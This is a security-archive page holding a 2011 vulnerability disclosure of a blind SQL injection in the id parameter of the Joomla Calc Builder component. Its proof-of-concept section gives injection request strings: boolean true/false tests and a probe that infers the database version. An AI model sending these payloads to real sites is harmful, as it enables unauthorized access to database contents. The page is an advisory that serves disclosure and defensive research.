exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Calc Builder Blind SQL Injection

Joomla Calc Builder Blind SQL Injection
Posted Jun 20, 2011
Authored by Chip D3 Bi0s

The Joomla Calc Builder component suffers from a remote blind SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | 894b0658c7f47e2e0258edefacac3c85c72658fc65534900d84d5918400e728e

Joomla Calc Builder Blind SQL Injection

Change Mirror Download
---------------------------------------------------------------------------------
Joomla Component Calc Builder (id) Blind SQL Injection Vulnerability
---------------------------------------------------------------------------------

Author : Chip D3 Bi0s
Group : LatinHackTeam
Email & msn : chipdebios[alt+64]gmail.com
Date : 19 June 2011
Critical Lvl : Moderate
Impact : Exposure of sensitive information
Where : From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Calc Builder
version : 0.0.1
Developer : Guillermo Santiago
License : GPLv2 or later type : Commercial
Date Added : 12 June 2011
Price : 9.90 €
Demo : http://components.moonsoft.es/democalcbuilder
Download : http://components.moonsoft.es/downloadcalcbuilder

Description :

CALC BUILDER allows you to create dynamic calculators.
Define your own input user form (types, size, order,validations).
Build results table through PHP code.
Export result table to PDF.
Simple and easy configuration. Three examples included.


---------------------------------------------------------------------------


I.Blind SQL injection (id) Poc/Exploit:
~~~~~~~~
.....option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 [blind]&fld_5=C

example
.....option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+1=1&fld_5=C
.....option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+1=2&fld_5=C

.....option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+substring(@@version,1,1)=4&fld_5=C
.....option=com_calcbuilder&controller=calcbuilder&format=raw&id=3 and+substring(@@version,1,1)=5&fld_5=C




A special greeting to my good friends:
R4y0k3nt, ecore, J3h3s, r0i & pc Marquesita :)



+++++++++++++++++++++++++++++++++++++++
[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++

Login or Register to add favorites

File Archive:

February 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    11 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    5 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    0 Files
  • 6
    Feb 6th
    0 Files
  • 7
    Feb 7th
    0 Files
  • 8
    Feb 8th
    0 Files
  • 9
    Feb 9th
    0 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    0 Files
  • 13
    Feb 13th
    0 Files
  • 14
    Feb 14th
    0 Files
  • 15
    Feb 15th
    0 Files
  • 16
    Feb 16th
    0 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close